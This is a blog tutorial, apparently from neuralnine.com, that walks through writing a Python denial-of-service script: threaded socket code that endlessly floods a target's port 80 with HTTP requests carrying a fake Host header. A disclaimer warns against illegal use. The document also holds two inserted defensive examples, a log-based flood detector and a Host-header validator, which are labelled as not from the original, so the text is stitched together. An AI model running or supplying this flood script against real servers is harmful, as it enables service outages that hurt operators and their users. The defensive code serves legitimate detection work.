Originally published at neuralnine.com

In this tutorial we are going to write a penetration-testing script, namely a DDOS script, in Python. This program will allow us to flood a server with so many requests that, after a while, it won’t be able to respond anymore and it will go down.

But let me give you a big warning here! Performing a DDOS attack on any server that is not yours or that you don’t have permission to attack is highly illegal. I do not recommend attacks on any servers other than your own and I am not responsible for what you are going to do with this script. This post is purely educational and shall help you to understand networking and programming with Python. So don’t do stupid things!

What is DDOS?

DDOS stands for _Distributed Denial of Service_ and it is an attack where we block the resources of a server by flooding it with requests. Usually this kind of attack is not performed alone but with the help of so-called botnets.

In a botnet, one hacker infects many computers and servers of ordinary people, in order to use them as _zombies_. He uses them for a collective attack on a server. Instead of one DDOS script, he can now run thousands of them. Sooner or later the server will be overwhelmed by the number of requests, so that it is not even able to respond to an ordinary user. For smaller and weaker servers, sometimes one attacker is enough to take it down. However, such an attack can usually be counteracted by blocking the IP-addresses of the attackers.
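To block the sources of a flood, a defender first has to find them. The following sketch is an added example, not code from the original tutorial: it scans web-server access log lines and reports every source address that exceeds a request budget within a sliding time window. The log lines, addresses, thresholds and the name `find_flooders` are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample in Common Log Format: one source sends 8 requests in
# 3 seconds, another sends 3 requests spread over 40 seconds.
SAMPLE_LOG = [
    f'10.0.0.57 - - [12/Mar/2024:10:00:{i // 3:02d} +0000] "GET /10.0.0.138 HTTP/1.1" 404 153'
    for i in range(8)
] + [
    f'10.0.0.20 - - [12/Mar/2024:10:00:{s:02d} +0000] "GET /index.html HTTP/1.1" 200 512'
    for s in (0, 20, 40)
]


def find_flooders(lines, max_requests=5, window_seconds=10):
    """Return {source_ip: peak request count} for sources over the budget.

    Assumes the entries of each source appear in time order, as they do in
    a normally written access log.
    """
    recent = defaultdict(deque)   # per-source timestamps inside the window
    peaks = {}
    for line in lines:
        match = LINE.match(line)
        if not match:
            continue              # skip malformed lines instead of failing
        ip = match.group(1)
        ts = datetime.strptime(match.group(2), TS_FORMAT)
        window = recent[ip]
        window.append(ts)
        # Drop requests that have fallen out of the sliding window.
        while (ts - window[0]).total_seconds() >= window_seconds:
            window.popleft()
        if len(window) > max_requests:
            peaks[ip] = max(peaks.get(ip, 0), len(window))
    return peaks


if __name__ == "__main__":
    for ip, peak in find_flooders(SAMPLE_LOG).items():
        print(f"block candidate {ip}: {peak} requests within 10 s")
```

The returned addresses are candidates for a firewall or reverse-proxy deny list; the thresholds have to be tuned to the normal traffic of the service being protected.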

Implementing The DDOS Script

The implementation of a DDOS script in Python is quite simple. We only need to send requests to a host on a specific port over and over again. This can be done with sockets. To speed the process up and make it more effective, we will use multi-threading as well. So, the following libraries will be needed for this tutorial:

```python
import socket
import threading
```

The first things we need are the target’s IP-address, the port we want to attack and the fake IP-address that we want to use. Notice that this kind of “fake” IP-address does not really conceal who you are. It doesn’t make you anonymous.

```python
target = '10.0.0.138'
fake_ip = '182.21.20.32'
port = 80
```

As I already mentioned, DDOS is illegal. So be careful with the target that you choose here. In this case, I chose the IP-address of my router at home. You can also choose your home server, your printer or maybe even your own website. If you don’t know your IP-address, you can use your command line and ping the domain to get it. As a fake IP-address I chose a random but still valid address. Last but not least, I decided to attack port 80, which is HTTP. If you want to shut down a specific service, you need to know which port it is operating on. Check out this link for a detailed list. The next thing we need to do is to implement the actual attacking function.

```python
def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        s.close()
```

This attack function is the function that will be running in each of our individual threads. It starts an endless loop, within which it creates a socket, connects to the target and sends an HTTP request over and over again. Of course, if you are attacking another port, you will also have to change the type of request you send.

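Here you can see that we are injecting our fake IP-address into the request, as the value of the Host header. The TCP connection itself is still made from our real address, which is why the fake address does not conceal who we are. The request itself needs to be encoded into bytes, so that it can be sent to the server. At the end of every iteration, we close our socket.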
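What the server sees for such a request can be shown from the receiving side. The following is an added example, not code from the original tutorial: it takes the peer address of an accepted connection together with the raw request bytes and decides whether the Host header names a host this server actually serves. The function `inspect_request`, the peer address `10.0.0.57` and the allow-list are assumptions made for illustration; the flood request bytes are built from the values used above.

```python
# Request as produced by the attack function above (constructed from its values).
FLOOD_REQUEST = b"GET /10.0.0.138 HTTP/1.1\r\nHost: 182.21.20.32\r\n\r\n"
# Constructed request from an ordinary client.
NORMAL_REQUEST = b"GET / HTTP/1.1\r\nHost: 10.0.0.138:80\r\nUser-Agent: demo\r\n\r\n"
# Hypothetical allow-list: the names and addresses this server answers for.
ALLOWED_HOSTS = {"10.0.0.138"}


def _result(peer_ip, host, accept, reason):
    return {"peer": peer_ip, "host": host, "accept": accept, "reason": reason}


def inspect_request(peer_ip, raw, allowed_hosts):
    """Classify one raw HTTP request head as the server receives it.

    peer_ip is taken from the accepted TCP connection, not from anything
    the client wrote, so the Host header cannot change it.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("ascii", errors="replace")
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return _result(peer_ip, None, False, "malformed request line")
    host = None
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":   # header names are case-insensitive
            host = value.strip().lower()
            break
    if host is None:
        return _result(peer_ip, None, False, "missing Host header")
    # Drop an optional ":port" suffix (IPv6 literals are left untouched).
    hostname = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    if hostname not in allowed_hosts:
        return _result(peer_ip, hostname, False, "Host not served here")
    return _result(peer_ip, hostname, True, "ok")


if __name__ == "__main__":
    print(inspect_request("10.0.0.57", FLOOD_REQUEST, ALLOWED_HOSTS))
    print(inspect_request("10.0.0.20", NORMAL_REQUEST, ALLOWED_HOSTS))
```

The rejected record still carries the real peer address, so a server that validates the Host header can both drop the request early and log the true source for blocking.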

Now the last thing that we need to do is to run multiple threads that execute this function at the same time. If we just ran the function, it would send a lot of requests over and over again, but always only one after the other. By using multi-threading, we can send many requests at once.

```python
for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()
```

In this case, we are starting 500 threads that will execute our function. Of course, you can play around with the number. Maybe 30 or 50 are already sufficient. When we now execute our script, we will DDOS the target but we won’t see anything. If you want to see some information, you may print the number of requests already sent. Just note that this will slow down your attack.

```python
attack_num = 0

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))

        global attack_num
        attack_num += 1
        print(attack_num)

        s.close()
```

We created a variable _attack_num_ that tracks how many requests have been sent already. With every iteration, we increase this number and print it.

That’s it for this tutorial! I really hope you learned something! Just don’t do stupid or illegal things with this knowledge! If you want to tell me something or ask questions, feel free to leave a comment! Check out my Instagram page or the other parts of this website, if you are interested in more! Stay tuned!
